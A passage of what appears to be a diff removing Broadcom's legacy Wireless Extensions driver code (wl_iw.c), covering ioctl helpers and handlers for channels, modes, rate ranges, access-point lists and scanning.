--	ifr.ifr_data = (caddr_t) &ioc;
--
--	fs = get_fs();
--	set_fs(get_ds());
--#if defined(WL_USE_NETDEV_OPS)
--	ret = dev->netdev_ops->ndo_do_ioctl(dev, &ifr, SIOCDEVPRIVATE);
--#else
--	ret = dev->do_ioctl(dev, &ifr, SIOCDEVPRIVATE);
--#endif
--	set_fs(fs);
--
--	return ret;
--}
--
--/*
--set named driver variable to int value and return error indication
--calling example: dev_wlc_intvar_set(dev, "arate", rate)
--*/
--
--static int
--dev_wlc_intvar_set(
--	struct net_device *dev,
--	char *name,
--	int val)
--{
--	char buf[WLC_IOCTL_SMLEN];
--	uint len;
--
--	val = htod32(val);
--	len = bcm_mkiovar(name, (char *)(&val), sizeof(val), buf, sizeof(buf));
--	DHD_WARN(len, return BCME_ERROR;);
--
--	return (dev_wlc_ioctl(dev, WLC_SET_VAR, buf, len));
--}
--
--static int
--dev_iw_iovar_setbuf(
--	struct net_device *dev,
--	char *iovar,
--	void *param,
--	int paramlen,
--	void *bufptr,
--	int buflen)
--{
--	int iolen;
--
--	iolen = bcm_mkiovar(iovar, param, paramlen, bufptr, buflen);
--	DHD_WARN(iolen, return BCME_ERROR;);
--	BCM_REFERENCE(iolen);
--
--	return (dev_wlc_ioctl(dev, WLC_SET_VAR, bufptr, iolen));
--}
--
--static int
--dev_iw_iovar_getbuf(
--	struct net_device *dev,
--	char *iovar,
--	void *param,
--	int paramlen,
--	void *bufptr,
--	int buflen)
--{
--	int iolen;
--
--	iolen = bcm_mkiovar(iovar, param, paramlen, bufptr, buflen);
--	DHD_WARN(iolen, return BCME_ERROR;);
--	BCM_REFERENCE(iolen);
--
--	return (dev_wlc_ioctl(dev, WLC_GET_VAR, bufptr, buflen));
--}
--
--#if WIRELESS_EXT > 17
--static int
--dev_wlc_bufvar_set(
--	struct net_device *dev,
--	char *name,
--	char *buf, int len)
--{
--	char *ioctlbuf;
--	uint buflen;
--	int error;
--
--	ioctlbuf = kmalloc(MAX_WLIW_IOCTL_LEN, GFP_KERNEL);
--	if (!ioctlbuf)
--		return -ENOMEM;
--
--	buflen = bcm_mkiovar(name, buf, len, ioctlbuf, MAX_WLIW_IOCTL_LEN);
--	DHD_WARN(buflen, return BCME_ERROR;);
--	error = dev_wlc_ioctl(dev, WLC_SET_VAR, ioctlbuf, buflen);
--
--	kfree(ioctlbuf);
--	return error;
--}
--#endif /* WIRELESS_EXT > 17 */
--
--/*
--get named driver variable to int value and return error indication
--calling example: dev_wlc_bufvar_get(dev, "arate", &rate)
--*/
--
--static int
--dev_wlc_bufvar_get(
--	struct net_device *dev,
--	char *name,
--	char *buf, int buflen)
--{
--	char *ioctlbuf;
--	int error;
--
--	uint len;
--
--	ioctlbuf = kmalloc(MAX_WLIW_IOCTL_LEN, GFP_KERNEL);
--	if (!ioctlbuf)
--		return -ENOMEM;
--	len = bcm_mkiovar(name, NULL, 0, ioctlbuf, MAX_WLIW_IOCTL_LEN);
--	DHD_WARN(len, return BCME_ERROR;);
--	BCM_REFERENCE(len);
--	error = dev_wlc_ioctl(dev, WLC_GET_VAR, (void *)ioctlbuf, MAX_WLIW_IOCTL_LEN);
--	if (!error)
--		bcopy(ioctlbuf, buf, buflen);
--
--	kfree(ioctlbuf);
--	return (error);
--}
--
--/*
--get named driver variable to int value and return error indication
--calling example: dev_wlc_intvar_get(dev, "arate", &rate)
--*/
--
--static int
--dev_wlc_intvar_get(
--	struct net_device *dev,
--	char *name,
--	int *retval)
--{
--	union {
--		char buf[WLC_IOCTL_SMLEN];
--		int val;
--	} var;
--	int error;
--
--	uint len;
--	uint data_null;
--
--	len = bcm_mkiovar(name, (char *)(&data_null), 0, (char *)(&var), sizeof(var.buf));
--	DHD_WARN(len, return BCME_ERROR;);
--	error = dev_wlc_ioctl(dev, WLC_GET_VAR, (void *)&var, len);
--
--	*retval = dtoh32(var.val);
--
--	return (error);
--}
--
--/* Maintain backward compatibility */
--#if WIRELESS_EXT < 13
--struct iw_request_info
--{
--	__u16		cmd;		/* Wireless Extension command */
--	__u16		flags;		/* More to come ;-) */
--};
--
--typedef int (*iw_handler)(struct net_device *dev, struct iw_request_info *info,
--	void *wrqu, char *extra);
--#endif /* WIRELESS_EXT < 13 */
--
--#if WIRELESS_EXT > 12
--static int
--wl_iw_set_leddc(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	union iwreq_data *wrqu,
--	char *extra
--)
--{
--	int dc = *(int *)extra;
--	int error;
--
--	error = dev_wlc_intvar_set(dev, "leddc", dc);
--	return error;
--}
--
--static int
--wl_iw_set_vlanmode(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	union iwreq_data *wrqu,
--	char *extra
--)
--{
--	int mode = *(int *)extra;
--	int error;
--
--	mode = htod32(mode);
--	error = dev_wlc_intvar_set(dev, "vlan_mode", mode);
--	return error;
--}
--
--static int
--wl_iw_set_pm(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	union iwreq_data *wrqu,
--	char *extra
--)
--{
--	int pm = *(int *)extra;
--	int error;
--
--	pm = htod32(pm);
--	error = dev_wlc_ioctl(dev, WLC_SET_PM, &pm, sizeof(pm));
--	return error;
--}
--
--#if WIRELESS_EXT > 17
--#endif /* WIRELESS_EXT > 17 */
--#endif /* WIRELESS_EXT > 12 */
--
--int
--wl_iw_send_priv_event(
--	struct net_device *dev,
--	char *flag
--)
--{
--	union iwreq_data wrqu;
--	char extra[IW_CUSTOM_MAX + 1];
--	int cmd;
--
--	cmd = IWEVCUSTOM;
--	memset(&wrqu, 0, sizeof(wrqu));
--	if (strlen(flag) > sizeof(extra))
--		return -1;
--
--	strcpy(extra, flag);
--	wrqu.data.length = strlen(extra);
--	wireless_send_event(dev, cmd, &wrqu, extra);
--	WL_TRACE(("Send IWEVCUSTOM Event as %s\n", extra));
--
--	return 0;
--}
--
--static int
--wl_iw_config_commit(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	void *zwrq,
--	char *extra
--)
--{
--	wlc_ssid_t ssid;
--	int error;
--	struct sockaddr bssid;
--
--	WL_TRACE(("%s: SIOCSIWCOMMIT\n", dev->name));
--
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_SSID, &ssid, sizeof(ssid))))
--		return error;
--
--	ssid.SSID_len = dtoh32(ssid.SSID_len);
--
--	if (!ssid.SSID_len)
--		return 0;
--
--	bzero(&bssid, sizeof(struct sockaddr));
--	if ((error = dev_wlc_ioctl(dev, WLC_REASSOC, &bssid, ETHER_ADDR_LEN))) {
--		WL_ERROR(("%s: WLC_REASSOC failed (%d)\n", __FUNCTION__, error));
--		return error;
--	}
--
--	return 0;
--}
--
--static int
--wl_iw_get_name(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	union iwreq_data *cwrq,
--	char *extra
--)
--{
--	int phytype, err;
--	uint band[3];
--	char cap[5];
--
--	WL_TRACE(("%s: SIOCGIWNAME\n", dev->name));
--
--	cap[0] = 0;
--	if ((err = dev_wlc_ioctl(dev, WLC_GET_PHYTYPE, &phytype, sizeof(phytype))) < 0)
--		goto done;
--	if ((err = dev_wlc_ioctl(dev, WLC_GET_BANDLIST, band, sizeof(band))) < 0)
--		goto done;
--
--	band[0] = dtoh32(band[0]);
--	switch (phytype) {
--		case WLC_PHY_TYPE_A:
--			strcpy(cap, "a");
--			break;
--		case WLC_PHY_TYPE_B:
--			strcpy(cap, "b");
--			break;
--		case WLC_PHY_TYPE_LP:
--		case WLC_PHY_TYPE_G:
--			if (band[0] >= 2)
--				strcpy(cap, "abg");
--			else
--				strcpy(cap, "bg");
--			break;
--		case WLC_PHY_TYPE_N:
--			if (band[0] >= 2)
--				strcpy(cap, "abgn");
--			else
--				strcpy(cap, "bgn");
--			break;
--	}
--done:
--	snprintf(cwrq->name, IFNAMSIZ, "IEEE 802.11%s", cap);
--	return 0;
--}
--
--static int
--wl_iw_set_freq(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_freq *fwrq,
--	char *extra
--)
--{
--	int error, chan;
--	uint sf = 0;
--
--	WL_TRACE(("%s: SIOCSIWFREQ\n", dev->name));
--
--	/* Setting by channel number */
--	if (fwrq->e == 0 && fwrq->m < MAXCHANNEL) {
--		chan = fwrq->m;
--	}
--
--	/* Setting by frequency */
--	else {
--		/* Convert to MHz as best we can */
--		if (fwrq->e >= 6) {
--			fwrq->e -= 6;
--			while (fwrq->e--)
--				fwrq->m *= 10;
--		} else if (fwrq->e < 6) {
--			while (fwrq->e++ < 6)
--				fwrq->m /= 10;
--		}
--	/* handle 4.9GHz frequencies as Japan 4 GHz based channelization */
--	if (fwrq->m > 4000 && fwrq->m < 5000)
--		sf = WF_CHAN_FACTOR_4_G; /* start factor for 4 GHz */
--
--		chan = wf_mhz2channel(fwrq->m, sf);
--	}
--	chan = htod32(chan);
--	if ((error = dev_wlc_ioctl(dev, WLC_SET_CHANNEL, &chan, sizeof(chan))))
--		return error;
--
--	/* -EINPROGRESS: Call commit handler */
--	return -EINPROGRESS;
--}
--
--static int
--wl_iw_get_freq(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_freq *fwrq,
--	char *extra
--)
--{
--	channel_info_t ci;
--	int error;
--
--	WL_TRACE(("%s: SIOCGIWFREQ\n", dev->name));
--
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_CHANNEL, &ci, sizeof(ci))))
--		return error;
--
--	/* Return radio channel in channel form */
--	fwrq->m = dtoh32(ci.hw_channel);
--	fwrq->e = dtoh32(0);
--	return 0;
--}
--
--static int
--wl_iw_set_mode(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	__u32 *uwrq,
--	char *extra
--)
--{
--	int infra = 0, ap = 0, error = 0;
--
--	WL_TRACE(("%s: SIOCSIWMODE\n", dev->name));
--
--	switch (*uwrq) {
--	case IW_MODE_MASTER:
--		infra = ap = 1;
--		break;
--	case IW_MODE_ADHOC:
--	case IW_MODE_AUTO:
--		break;
--	case IW_MODE_INFRA:
--		infra = 1;
--		break;
--	default:
--		return -EINVAL;
--	}
--	infra = htod32(infra);
--	ap = htod32(ap);
--
--	if ((error = dev_wlc_ioctl(dev, WLC_SET_INFRA, &infra, sizeof(infra))) ||
--	    (error = dev_wlc_ioctl(dev, WLC_SET_AP, &ap, sizeof(ap))))
--		return error;
--
--	/* -EINPROGRESS: Call commit handler */
--	return -EINPROGRESS;
--}
--
--static int
--wl_iw_get_mode(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	__u32 *uwrq,
--	char *extra
--)
--{
--	int error, infra = 0, ap = 0;
--
--	WL_TRACE(("%s: SIOCGIWMODE\n", dev->name));
--
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_INFRA, &infra, sizeof(infra))) ||
--	    (error = dev_wlc_ioctl(dev, WLC_GET_AP, &ap, sizeof(ap))))
--		return error;
--
--	infra = dtoh32(infra);
--	ap = dtoh32(ap);
--	*uwrq = infra ? ap ? IW_MODE_MASTER : IW_MODE_INFRA : IW_MODE_ADHOC;
--
--	return 0;
--}
--
--static int
--wl_iw_get_range(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	struct iw_range *range = (struct iw_range *) extra;
--	static int channels[MAXCHANNEL+1];
--	wl_uint32_list_t *list = (wl_uint32_list_t *) channels;
--	wl_rateset_t rateset;
--	int error, i, k;
--	uint sf, ch;
--
--	int phytype;
--	int bw_cap = 0, sgi_tx = 0, nmode = 0;
--	channel_info_t ci;
--	uint8 nrate_list2copy = 0;
--	uint16 nrate_list[4][8] = { {13, 26, 39, 52, 78, 104, 117, 130},
--		{14, 29, 43, 58, 87, 116, 130, 144},
--		{27, 54, 81, 108, 162, 216, 243, 270},
--		{30, 60, 90, 120, 180, 240, 270, 300}};
--	int fbt_cap = 0;
--
--	WL_TRACE(("%s: SIOCGIWRANGE\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	dwrq->length = sizeof(struct iw_range);
--	memset(range, 0, sizeof(*range));
--
--	/* We don't use nwids */
--	range->min_nwid = range->max_nwid = 0;
--
--	/* Set available channels/frequencies */
--	list->count = htod32(MAXCHANNEL);
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_VALID_CHANNELS, channels, sizeof(channels))))
--		return error;
--	for (i = 0; i < dtoh32(list->count) && i < IW_MAX_FREQUENCIES; i++) {
--		range->freq[i].i = dtoh32(list->element[i]);
--
--		ch = dtoh32(list->element[i]);
--		if (ch <= CH_MAX_2G_CHANNEL)
--			sf = WF_CHAN_FACTOR_2_4_G;
--		else
--			sf = WF_CHAN_FACTOR_5_G;
--
--		range->freq[i].m = wf_channel2mhz(ch, sf);
--		range->freq[i].e = 6;
--	}
--	range->num_frequency = range->num_channels = i;
--
--	/* Link quality (use NDIS cutoffs) */
--	range->max_qual.qual = 5;
--	/* Signal level (use RSSI) */
--	range->max_qual.level = 0x100 - 200;	/* -200 dBm */
--	/* Noise level (use noise) */
--	range->max_qual.noise = 0x100 - 200;	/* -200 dBm */
--	/* Signal level threshold range (?) */
--	range->sensitivity = 65535;
--
--#if WIRELESS_EXT > 11
--	/* Link quality (use NDIS cutoffs) */
--	range->avg_qual.qual = 3;
--	/* Signal level (use RSSI) */
--	range->avg_qual.level = 0x100 + WL_IW_RSSI_GOOD;
--	/* Noise level (use noise) */
--	range->avg_qual.noise = 0x100 - 75;	/* -75 dBm */
--#endif /* WIRELESS_EXT > 11 */
--
--	/* Set available bitrates */
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_CURR_RATESET, &rateset, sizeof(rateset))))
--		return error;
--	rateset.count = dtoh32(rateset.count);
--	range->num_bitrates = rateset.count;
--	for (i = 0; i < rateset.count && i < IW_MAX_BITRATES; i++)
--		range->bitrate[i] = (rateset.rates[i] & 0x7f) * 500000; /* convert to bps */
--	if ((error = dev_wlc_intvar_get(dev, "nmode", &nmode)))
--		return error;
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_PHYTYPE, &phytype, sizeof(phytype))))
--		return error;
--	if (nmode == 1 && ((phytype == WLC_PHY_TYPE_SSN) || (phytype == WLC_PHY_TYPE_LCN) ||
--		(phytype == WLC_PHY_TYPE_LCN40))) {
--		if ((error = dev_wlc_intvar_get(dev, "mimo_bw_cap", &bw_cap)))
--			return error;
--		if ((error = dev_wlc_intvar_get(dev, "sgi_tx", &sgi_tx)))
--			return error;
--		if ((error = dev_wlc_ioctl(dev, WLC_GET_CHANNEL, &ci, sizeof(channel_info_t))))
--			return error;
--		ci.hw_channel = dtoh32(ci.hw_channel);
--
--		if (bw_cap == 0 ||
--			(bw_cap == 2 && ci.hw_channel <= 14)) {
--			if (sgi_tx == 0)
--				nrate_list2copy = 0;
--			else
--				nrate_list2copy = 1;
--		}
--		if (bw_cap == 1 ||
--			(bw_cap == 2 && ci.hw_channel >= 36)) {
--			if (sgi_tx == 0)
--				nrate_list2copy = 2;
--			else
--				nrate_list2copy = 3;
--		}
--		range->num_bitrates += 8;
--		DHD_WARN(range->num_bitrates < IW_MAX_BITRATES, return BCME_ERROR;);
--		for (k = 0; i < range->num_bitrates; k++, i++) {
--			/* convert to bps */
--			range->bitrate[i] = (nrate_list[nrate_list2copy][k]) * 500000;
--		}
--	}
--
--	/* Set an indication of the max TCP throughput
--	 * in bit/s that we can expect using this interface.
--	 * May be use for QoS stuff... Jean II
--	 */
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_PHYTYPE, &i, sizeof(i))))
--		return error;
--	i = dtoh32(i);
--	if (i == WLC_PHY_TYPE_A)
--		range->throughput = 24000000;	/* 24 Mbits/s */
--	else
--		range->throughput = 1500000;	/* 1.5 Mbits/s */
--
--	/* RTS and fragmentation thresholds */
--	range->min_rts = 0;
--	range->max_rts = 2347;
--	range->min_frag = 256;
--	range->max_frag = 2346;
--
--	range->max_encoding_tokens = DOT11_MAX_DEFAULT_KEYS;
--	range->num_encoding_sizes = 4;
--	range->encoding_size[0] = WEP1_KEY_SIZE;
--	range->encoding_size[1] = WEP128_KEY_SIZE;
--#if WIRELESS_EXT > 17
--	range->encoding_size[2] = TKIP_KEY_SIZE;
--#else
--	range->encoding_size[2] = 0;
--#endif
--	range->encoding_size[3] = AES_KEY_SIZE;
--
--	/* Do not support power micro-management */
--	range->min_pmp = 0;
--	range->max_pmp = 0;
--	range->min_pmt = 0;
--	range->max_pmt = 0;
--	range->pmp_flags = 0;
--	range->pm_capa = 0;
--
--	/* Transmit Power - values are in mW */
--	range->num_txpower = 2;
--	range->txpower[0] = 1;
--	range->txpower[1] = 255;
--	range->txpower_capa = IW_TXPOW_MWATT;
--
--#if WIRELESS_EXT > 10
--	range->we_version_compiled = WIRELESS_EXT;
--	range->we_version_source = 19;
--
--	/* Only support retry limits */
--	range->retry_capa = IW_RETRY_LIMIT;
--	range->retry_flags = IW_RETRY_LIMIT;
--	range->r_time_flags = 0;
--	/* SRL and LRL limits */
--	range->min_retry = 1;
--	range->max_retry = 255;
--	/* Retry lifetime limits unsupported */
--	range->min_r_time = 0;
--	range->max_r_time = 0;
--#endif /* WIRELESS_EXT > 10 */
--
--#if WIRELESS_EXT > 17
--	range->enc_capa = IW_ENC_CAPA_WPA;
--	range->enc_capa |= IW_ENC_CAPA_CIPHER_TKIP;
--	range->enc_capa |= IW_ENC_CAPA_CIPHER_CCMP;
--	range->enc_capa |= IW_ENC_CAPA_WPA2;
--
--	/* Determine driver FBT capability. */
--	if (dev_wlc_intvar_get(dev, "fbt_cap", &fbt_cap) == 0) {
--		if (fbt_cap == WLC_FBT_CAP_DRV_4WAY_AND_REASSOC) {
--			/* Tell the host (e.g. wpa_supplicant) to let driver do the handshake */
--			range->enc_capa |= IW_ENC_CAPA_4WAY_HANDSHAKE;
--		}
--	}
--
--#ifdef BCMFW_ROAM_ENABLE_WEXT
--	/* Advertise firmware roam capability to the external supplicant */
--	range->enc_capa |= IW_ENC_CAPA_FW_ROAM_ENABLE;
--#endif /* BCMFW_ROAM_ENABLE_WEXT */
--
--	/* Event capability (kernel) */
--	IW_EVENT_CAPA_SET_KERNEL(range->event_capa);
--	/* Event capability (driver) */
--	IW_EVENT_CAPA_SET(range->event_capa, SIOCGIWAP);
--	IW_EVENT_CAPA_SET(range->event_capa, SIOCGIWSCAN);
--	IW_EVENT_CAPA_SET(range->event_capa, IWEVTXDROP);
--	IW_EVENT_CAPA_SET(range->event_capa, IWEVMICHAELMICFAILURE);
--	IW_EVENT_CAPA_SET(range->event_capa, IWEVASSOCREQIE);
--	IW_EVENT_CAPA_SET(range->event_capa, IWEVASSOCRESPIE);
--	IW_EVENT_CAPA_SET(range->event_capa, IWEVPMKIDCAND);
--
--#if WIRELESS_EXT >= 22 && defined(IW_SCAN_CAPA_ESSID)
--	/* FC7 wireless.h defines EXT 22 but doesn't define scan_capa bits */
--	range->scan_capa = IW_SCAN_CAPA_ESSID;
--#endif
--#endif /* WIRELESS_EXT > 17 */
--
--	return 0;
--}
--
--static int
--rssi_to_qual(int rssi)
--{
--	if (rssi <= WL_IW_RSSI_NO_SIGNAL)
--		return 0;
--	else if (rssi <= WL_IW_RSSI_VERY_LOW)
--		return 1;
--	else if (rssi <= WL_IW_RSSI_LOW)
--		return 2;
--	else if (rssi <= WL_IW_RSSI_GOOD)
--		return 3;
--	else if (rssi <= WL_IW_RSSI_VERY_GOOD)
--		return 4;
--	else
--		return 5;
--}
--
--static int
--wl_iw_set_spy(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_iw_t *iw = IW_DEV_IF(dev);
--	struct sockaddr *addr = (struct sockaddr *) extra;
--	int i;
--
--	WL_TRACE(("%s: SIOCSIWSPY\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	iw->spy_num = MIN(ARRAYSIZE(iw->spy_addr), dwrq->length);
--	for (i = 0; i < iw->spy_num; i++)
--		memcpy(&iw->spy_addr[i], addr[i].sa_data, ETHER_ADDR_LEN);
--	memset(iw->spy_qual, 0, sizeof(iw->spy_qual));
--
--	return 0;
--}
--
--static int
--wl_iw_get_spy(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_iw_t *iw = IW_DEV_IF(dev);
--	struct sockaddr *addr = (struct sockaddr *) extra;
--	struct iw_quality *qual = (struct iw_quality *) &addr[iw->spy_num];
--	int i;
--
--	WL_TRACE(("%s: SIOCGIWSPY\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	dwrq->length = iw->spy_num;
--	for (i = 0; i < iw->spy_num; i++) {
--		memcpy(addr[i].sa_data, &iw->spy_addr[i], ETHER_ADDR_LEN);
--		addr[i].sa_family = AF_UNIX;
--		memcpy(&qual[i], &iw->spy_qual[i], sizeof(struct iw_quality));
--		iw->spy_qual[i].updated = 0;
--	}
--
--	return 0;
--}
--
--static int
--wl_iw_set_wap(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct sockaddr *awrq,
--	char *extra
--)
--{
--	int error = -EINVAL;
--
--	WL_TRACE(("%s: SIOCSIWAP\n", dev->name));
--
--	if (awrq->sa_family != ARPHRD_ETHER) {
--		WL_ERROR(("%s: Invalid Header...sa_family\n", __FUNCTION__));
--		return -EINVAL;
--	}
--
--	/* Ignore "auto" or "off" */
--	if (ETHER_ISBCAST(awrq->sa_data) || ETHER_ISNULLADDR(awrq->sa_data)) {
--		scb_val_t scbval;
--		bzero(&scbval, sizeof(scb_val_t));
--		if ((error = dev_wlc_ioctl(dev, WLC_DISASSOC, &scbval, sizeof(scb_val_t)))) {
--			WL_ERROR(("%s: WLC_DISASSOC failed (%d).\n", __FUNCTION__, error));
--		}
--		return 0;
--	}
--	/* WL_ASSOC(("Assoc to %s\n", bcm_ether_ntoa((struct ether_addr *)&(awrq->sa_data),
--	 * eabuf)));
--	 */
--	/* Reassociate to the specified AP */
--	if ((error = dev_wlc_ioctl(dev, WLC_REASSOC, awrq->sa_data, ETHER_ADDR_LEN))) {
--		WL_ERROR(("%s: WLC_REASSOC failed (%d).\n", __FUNCTION__, error));
--		return error;
--	}
--
--	return 0;
--}
--
--static int
--wl_iw_get_wap(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct sockaddr *awrq,
--	char *extra
--)
--{
--	WL_TRACE(("%s: SIOCGIWAP\n", dev->name));
--
--	awrq->sa_family = ARPHRD_ETHER;
--	memset(awrq->sa_data, 0, ETHER_ADDR_LEN);
--
--	/* Ignore error (may be down or disassociated) */
--	(void) dev_wlc_ioctl(dev, WLC_GET_BSSID, awrq->sa_data, ETHER_ADDR_LEN);
--
--	return 0;
--}
--
--#if WIRELESS_EXT > 17
--static int
--wl_iw_mlme(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct sockaddr *awrq,
--	char *extra
--)
--{
--	struct iw_mlme *mlme;
--	scb_val_t scbval;
--	int error  = -EINVAL;
--
--	WL_TRACE(("%s: SIOCSIWMLME\n", dev->name));
--
--	mlme = (struct iw_mlme *)extra;
--	if (mlme == NULL) {
--		WL_ERROR(("Invalid ioctl data.\n"));
--		return error;
--	}
--
--	scbval.val = mlme->reason_code;
--	bcopy(&mlme->addr.sa_data, &scbval.ea, ETHER_ADDR_LEN);
--
--	if (mlme->cmd == IW_MLME_DISASSOC) {
--		scbval.val = htod32(scbval.val);
--		error = dev_wlc_ioctl(dev, WLC_DISASSOC, &scbval, sizeof(scb_val_t));
--	}
--	else if (mlme->cmd == IW_MLME_DEAUTH) {
--		scbval.val = htod32(scbval.val);
--		error = dev_wlc_ioctl(dev, WLC_SCB_DEAUTHENTICATE_FOR_REASON, &scbval,
--			sizeof(scb_val_t));
--	}
--	else {
--		WL_ERROR(("%s: Invalid ioctl data.\n", __FUNCTION__));
--		return error;
--	}
--
--	return error;
--}
--#endif /* WIRELESS_EXT > 17 */
--
--static int
--wl_iw_get_aplist(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_scan_results_t *list;
--	struct sockaddr *addr = (struct sockaddr *) extra;
--	struct iw_quality qual[IW_MAX_AP];
--	wl_bss_info_t *bi = NULL;
--	int error, i;
--	uint buflen = dwrq->length;
--
--	WL_TRACE(("%s: SIOCGIWAPLIST\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	/* Get scan results (too large to put on the stack) */
--	list = kmalloc(buflen, GFP_KERNEL);
--	if (!list)
--		return -ENOMEM;
--	memset(list, 0, buflen);
--	list->buflen = htod32(buflen);
--	if ((error = dev_wlc_ioctl(dev, WLC_SCAN_RESULTS, list, buflen))) {
--		WL_ERROR(("%d: Scan results error %d\n", __LINE__, error));
--		kfree(list);
--		return error;
--	}
--	list->buflen = dtoh32(list->buflen);
--	list->version = dtoh32(list->version);
--	list->count = dtoh32(list->count);
--	DHD_WARN(list->version == WL_BSS_INFO_VERSION, kfree(list);return BCME_ERROR;);
--
--	for (i = 0, dwrq->length = 0; i < list->count && dwrq->length < IW_MAX_AP; i++) {
--		bi = bi ? (wl_bss_info_t *)((uintptr)bi + dtoh32(bi->length)) : list->bss_info;
--		DHD_WARN(((uintptr)bi + dtoh32(bi->length)) <= ((uintptr)list +
--			buflen), kfree(list);return BCME_ERROR;);
--
--		/* Infrastructure only */
--		if (!(dtoh16(bi->capability) & DOT11_CAP_ESS))
--			continue;
--
--		/* BSSID */
--		memcpy(addr[dwrq->length].sa_data, &bi->BSSID, ETHER_ADDR_LEN);
--		addr[dwrq->length].sa_family = ARPHRD_ETHER;
--		qual[dwrq->length].qual = rssi_to_qual(dtoh16(bi->RSSI));
--		qual[dwrq->length].level = 0x100 + dtoh16(bi->RSSI);
--		qual[dwrq->length].noise = 0x100 + bi->phy_noise;
--
--		/* Updated qual, level, and noise */
--#if WIRELESS_EXT > 18
--		qual[dwrq->length].updated = IW_QUAL_ALL_UPDATED | IW_QUAL_DBM;
--#else
--		qual[dwrq->length].updated = 7;
--#endif /* WIRELESS_EXT > 18 */
--
--		dwrq->length++;
--	}
--
--	kfree(list);
--
--	if (dwrq->length) {
--		memcpy(&addr[dwrq->length], qual, sizeof(struct iw_quality) * dwrq->length);
--		/* Provided qual */
--		dwrq->flags = 1;
--	}
--
--	return 0;
--}
--
--static int
--wl_iw_iscan_get_aplist(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_scan_results_t *list;
--	iscan_buf_t * buf;
--	iscan_info_t *iscan = g_iscan;
--
--	struct sockaddr *addr = (struct sockaddr *) extra;
--	struct iw_quality qual[IW_MAX_AP];
--	wl_bss_info_t *bi = NULL;
--	int i;
--
--	WL_TRACE(("%s: SIOCGIWAPLIST\n", dev->name));
--
--	if (!extra)
--		return -EINVAL;
--
--	if ((!iscan) || (iscan->sysioc_pid < 0)) {
--		return wl_iw_get_aplist(dev, info, dwrq, extra);
--	}
--
--	buf = iscan->list_hdr;
--	/* Get scan results (too large to put on the stack) */
--	while (buf) {
--	    list = &((wl_iscan_results_t*)buf->iscan_buf)->results;
--		DHD_WARN(list->version == WL_BSS_INFO_VERSION, return BCME_ERROR;);
--
--	    bi = NULL;
--	for (i = 0, dwrq->length = 0; i < list->count && dwrq->length < IW_MAX_AP; i++) {
--		bi = bi ? (wl_bss_info_t *)((uintptr)bi + dtoh32(bi->length)) : list->bss_info;
--		DHD_WARN(((uintptr)bi + dtoh32(bi->length)) <= ((uintptr)list +
--			WLC_IW_ISCAN_MAXLEN), return BCME_ERROR;);
--
--		/* Infrastructure only */
--		if (!(dtoh16(bi->capability) & DOT11_CAP_ESS))
--			continue;
--
--		/* BSSID */
--		memcpy(addr[dwrq->length].sa_data, &bi->BSSID, ETHER_ADDR_LEN);
--		addr[dwrq->length].sa_family = ARPHRD_ETHER;
--		qual[dwrq->length].qual = rssi_to_qual(dtoh16(bi->RSSI));
--		qual[dwrq->length].level = 0x100 + dtoh16(bi->RSSI);
--		qual[dwrq->length].noise = 0x100 + bi->phy_noise;
--
--		/* Updated qual, level, and noise */
--#if WIRELESS_EXT > 18
--		qual[dwrq->length].updated = IW_QUAL_ALL_UPDATED | IW_QUAL_DBM;
--#else
--		qual[dwrq->length].updated = 7;
--#endif /* WIRELESS_EXT > 18 */
--
--		dwrq->length++;
--	    }
--	    buf = buf->next;
--	}
--	if (dwrq->length) {
--		memcpy(&addr[dwrq->length], qual, sizeof(struct iw_quality) * dwrq->length);
--		/* Provided qual */
--		dwrq->flags = 1;
--	}
--
--	return 0;
--}
--
--#if WIRELESS_EXT > 13
--static int
--wl_iw_set_scan(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	union iwreq_data *wrqu,
--	char *extra
--)
--{
--	wlc_ssid_t ssid;
--
--	WL_TRACE(("%s: SIOCSIWSCAN\n", dev->name));
--
--	/* default Broadcast scan */
--	memset(&ssid, 0, sizeof(ssid));
--
--#if WIRELESS_EXT > 17
--	/* check for given essid */
--	if (wrqu->data.length == sizeof(struct iw_scan_req)) {
--		if (wrqu->data.flags & IW_SCAN_THIS_ESSID) {
--			struct iw_scan_req *req = (struct iw_scan_req *)extra;
--			ssid.SSID_len = MIN(sizeof(ssid.SSID), req->essid_len);
--			memcpy(ssid.SSID, req->essid, ssid.SSID_len);
--			ssid.SSID_len = htod32(ssid.SSID_len);
--		}
--	}
--#endif
--	/* Ignore error (most likely scan in progress) */
--	(void) dev_wlc_ioctl(dev, WLC_SCAN, &ssid, sizeof(ssid));
--
--	return 0;
--}
--
--static int
--wl_iw_iscan_set_scan(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	union iwreq_data *wrqu,
--	char *extra
--)
--{
--	wlc_ssid_t ssid;
--	iscan_info_t *iscan = g_iscan;
--
